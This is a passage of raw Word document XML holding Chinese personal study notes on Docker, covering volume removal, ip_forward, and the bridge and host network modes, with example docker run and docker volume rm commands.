    <w:p w14:paraId="5AC4578C" w14:textId="77777777" w:rsidR="00EB53D3" w:rsidRDefault="00EB53D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB167AA" w14:textId="38639E6D" w:rsidR="00EB53D3" w:rsidRDefault="00B80FC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2865546F" wp14:editId="3064B135">
            <wp:extent cx="5274310" cy="2126615"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="273400841" name="图片 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2126615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CE1B3E" w14:textId="2C15A7DB" w:rsidR="00EB53D3" w:rsidRDefault="00B80FC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B80FC9">
        <w:t>net.ipv4.ip_forward = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5110408B" w14:textId="754A21DA" w:rsidR="00B80FC9" w:rsidRDefault="00B80FC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后容器内也能上网了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F03A1F" w14:textId="2CE359D0" w:rsidR="00EB53D3" w:rsidRDefault="00B80FC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C0BA160" wp14:editId="660BBA55">
            <wp:extent cx="5274310" cy="1819910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="912044721" name="图片 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1819910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8D7798" w14:textId="2BAA5AD6" w:rsidR="00F2590D" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_Toc159779588"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>ocker volume</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p w14:paraId="79DFC897" w14:textId="77777777" w:rsidR="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5010DFFB" w14:textId="349E2020" w:rsidR="00BB76FE" w:rsidRPr="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB76FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB76FE">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">ocker volume </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB76FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB76FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB76FE">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ls r</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB76FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB76FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>等子命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA4D0BB" w14:textId="77777777" w:rsidR="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BBF76EF" w14:textId="77777777" w:rsidR="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker rm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令删除容器时，默认情况下不会删除与该容器关联的挂载的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卷（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Docker volume</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卷是一个独立于容器的数据存储区域，通常用于持久化存储容器内的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B42606D" w14:textId="77777777" w:rsidR="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C7A18E1" w14:textId="77777777" w:rsidR="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果您使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -v </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数来挂载卷，那么删除容器时不会删除这个卷。要删除与容器关联的卷，您需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker volume rm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03193D11" w14:textId="77777777" w:rsidR="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A487A08" w14:textId="77777777" w:rsidR="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，如果您的容器启动命令中有如下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -v </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619CC612" w14:textId="77777777" w:rsidR="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566783F8" w14:textId="77777777" w:rsidR="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>docker run -v /host/path:/container/path my_image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3E9C5B" w14:textId="77777777" w:rsidR="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69013209" w14:textId="77777777" w:rsidR="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB76FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>么删除容器时，卷</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB76FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> /host/path </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB76FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不会被自动删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。要手动删除该卷，可以运行以下命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B16F0E7" w14:textId="77777777" w:rsidR="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A24BF5D" w14:textId="77777777" w:rsidR="00BB76FE" w:rsidRPr="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB76FE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>docker volume rm $(docker volume ls -qf "mount=/host/path")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECE066A" w14:textId="77777777" w:rsidR="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D8C9C2" w14:textId="77777777" w:rsidR="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这将删除与指定路径关联的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卷。请注意替换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> /host/path </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为实际使用的卷路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C0C242" w14:textId="77777777" w:rsidR="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="369B6812" w14:textId="68E95350" w:rsidR="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总之，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">docker rm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认不会删除挂载的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卷，您需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker volume rm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令手动删除它们。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB597E7" w14:textId="77777777" w:rsidR="00BB76FE" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C96A069" w14:textId="77777777" w:rsidR="00BB76FE" w:rsidRPr="00F2590D" w:rsidRDefault="00BB76FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B8714CB" w14:textId="14654E72" w:rsidR="004C452C" w:rsidRDefault="00CC3622" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_Toc159779589"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w14:paraId="221EE502" w14:textId="77777777" w:rsidR="00EB53D3" w:rsidRPr="00EB53D3" w:rsidRDefault="00EB53D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="235686E6" w14:textId="24EB6E11" w:rsidR="00CC3622" w:rsidRDefault="00602DF6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="_Toc159779590"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bridge</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w14:paraId="7E32BF6D" w14:textId="77777777" w:rsidR="00602DF6" w:rsidRDefault="00602DF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02DE71A4" w14:textId="3B25E28A" w:rsidR="00D71A86" w:rsidRDefault="00877EF7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00444310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidR="00622BF4" w:rsidRPr="00444310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的网络模式</w:t>
      </w:r>
      <w:r w:rsidRPr="00444310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>默认使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00444310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>bridge</w:t>
      </w:r>
      <w:r w:rsidRPr="00444310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>模式</w:t>
      </w:r>
      <w:r w:rsidR="00444310" w:rsidRPr="00444310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00444310" w:rsidRPr="00444310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidR="00444310" w:rsidRPr="00444310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>访问主机的</w:t>
      </w:r>
      <w:r w:rsidR="00444310" w:rsidRPr="00444310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00444310" w:rsidRPr="00444310">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3306</w:t>
      </w:r>
      <w:r w:rsidR="00444310" w:rsidRPr="00444310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>数据库，需要</w:t>
      </w:r>
      <w:r w:rsidR="00444310" w:rsidRPr="00444310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00444310" w:rsidRPr="00444310">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fw add 23306/tcp</w:t>
      </w:r>
      <w:r w:rsidR="00444310" w:rsidRPr="00444310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，因为桥接下容器的包被主机视为外来包）</w:t>
      </w:r>
      <w:r w:rsidRPr="00444310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00444310" w:rsidRPr="00444310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="00444310" w:rsidRPr="00444310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidR="00444310" w:rsidRPr="00444310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>则完全属于了主机本身网络，无法指定端口映射</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB5920D" w14:textId="77777777" w:rsidR="00D71A86" w:rsidRDefault="00D71A86" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C894A2D" w14:textId="2FB444C0" w:rsidR="00E35F0E" w:rsidRDefault="00E35F0E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，每个容器都运行在其自己的网络命名空间中，拥有自己的网络栈。</w:t>
      </w:r>
      <w:r w:rsidRPr="007962DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>默认情况下，容器可以访问外部网络</w:t>
      </w:r>
      <w:r w:rsidR="007962DF" w:rsidRPr="007962DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007962DF" w:rsidRPr="007962DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>默认就是</w:t>
      </w:r>
      <w:r w:rsidR="007962DF" w:rsidRPr="007962DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>bridge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但可能存在一些配置问题导致你无法访问内网。以下是一些可能的解决方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EF6FA8" w14:textId="77777777" w:rsidR="00E35F0E" w:rsidRDefault="00E35F0E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FE5509C" w14:textId="34FDAE99" w:rsidR="00E35F0E" w:rsidRPr="00602DF6" w:rsidRDefault="00E35F0E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> host </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络模式：如果你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器需要访问内网中的服务，一种可能的解决方案是</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71A86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71A86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> host </w:t>
      </w:r>
      <w:r w:rsidRPr="00D71A86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>网络模式运行你的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71A86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r w:rsidRPr="00D71A86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>容器。在这种模式下，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71A86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidRPr="00D71A86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>容器将共享主机的网络命名空间，可以直接访问主机网络中的所有服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D71A86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>--network host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项运行你的容器，例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00602DF6">
        <w:t>docker run --network host my-image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B523CA6" w14:textId="71F8E3AC" w:rsidR="00E35F0E" w:rsidRDefault="00883A1F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc159779591"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r w:rsidR="0026478E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:p w14:paraId="4CED8D30" w14:textId="77777777" w:rsidR="00E35F0E" w:rsidRDefault="00E35F0E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络：另一种可能的解决方案是创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络，并在这个网络上运行你的容器。你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
